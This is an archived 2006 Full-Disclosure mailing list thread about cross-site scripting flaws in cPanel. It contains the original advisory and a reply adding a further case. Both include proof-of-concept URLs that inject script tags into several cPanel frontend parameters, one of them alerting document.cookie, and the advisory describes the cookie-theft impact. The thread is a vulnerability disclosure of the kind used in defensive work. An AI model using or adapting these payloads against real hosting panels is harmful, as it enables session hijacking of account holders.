Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11343
HistoryFeb 08, 2006 - 12:00 a.m.

[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability

2006-02-0800:00:00
vulners.com
14
JSON

One more to ur list
http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder

Sumit

On 2/4/06, Hamish Stanaway <[email protected]> wrote:
Hi there,

Thank you for finding this vulnerability in a widely used software. I was
wondering if you had a solution or a work around to this issue?

Kindest of regards,

Hamish Stanaway, CEO

Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand

http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com

>From: [email protected]
>To: [email protected]
>Subject: cPanel Multiple Cross Site Scripting Vulnerability
>Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
>MIME-Version: 1.0
>Received: from outgoing.securityfocus.com ([205.206.231.27]) by
>bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri, 3
>Feb 2006 08:56:14 -0800
>Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
> via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3 Feb
>2006 08:33:09 -0800
>Received: from lists2.securityfocus.com ( lists2.securityfocus.com
>[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
>803C22370A5; Fri, 3 Feb 2006 08:16:33 -0700 (MST)
>Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000
>X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA=
>Mailing-List: contact [email protected]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto: [email protected]>
>List-Help: <mailto:[email protected]>
>List-Unsubscribe: <mailto: [email protected]>
>List-Subscribe: <mailto:[email protected]>
>Delivered-To: mailing list [email protected]
>Delivered-To: moderator for [email protected]
>User-Agent: SquirrelMail/1.4.4
>X-AntiAbuse: This header was added to track abuse, please include it with
>any abuse report
>X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
>X-AntiAbuse: Original Domain - securityfocus.com
>X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12]
>X-AntiAbuse: Sender Address Domain - morx.org
>X-Source: X-Source-Args: X-Source-Dir: Return-Path:
>bugtraq-return-23195-koremeltdown= [email protected]
>X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC)
>FILETIME=[BE6AAD60:01C628E2]
>
>Title: cPanel Multiple Cross Site Scripting
>
>Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
>Discovered: 22 january 2005
>Published: 02 february 2006
>MorX Security Research Team
> http://www.morx.org
>
>Service: Web Hosting Manager
>
>Vendor: cPanel
>
>Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
>
>Severity: Medium/High
>
>Details:
>
>cPanel (control panel) is a graphical web-based management tool, designed
>to make administration of web sites as easy as possible. cPanel handles
>all aspects of website administration in an easy-to-use interface.
>The software, which is proprietary, runs on a number of popular RPM-based
>Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
>Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
>accessed on ports 2082 and 2083 (for a SSL version). Authentication is
>either via HTTP or web page login. cPanel is prone to cross-site scripting
>attacks. This problem is due to a failure in the application to properly
>sanitize user-supplied input
>
>
>
>Impact:
>
>an attacker can exploit the vulnerable scripts to have arbitrary script
>code executed in the browser of an authentified cPanel user in the context
>of the website hosting the vulnerable cPanel version. resulting in the
>theft of cookie-based authentication giving the attacker full access to
>the victim's cPanel account as well as other type of attacks.
>
>
>Affected scripts with proof of concept exploit:
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email= <script>alert('vul')</script>&domain=
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email= <script>alert('vul')</script>&domain=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0 "><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006&amp;domain=xxx&amp;target= "><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006&amp;domain=xxx "><script>alert('vul')</script>&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006 "><script>alert('vul')</script>&domain=xxx&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
>
>
>Disclaimer:
>
>this entire document is for eductional, testing and demonstrating purpose
>only. Modification use and/or publishing this information is entirely on
>your OWN risk. The information provided in this advisory is to be
>used/tested on your OWN machine/Account. I cannot be held responsible for
>any of the above.

JSON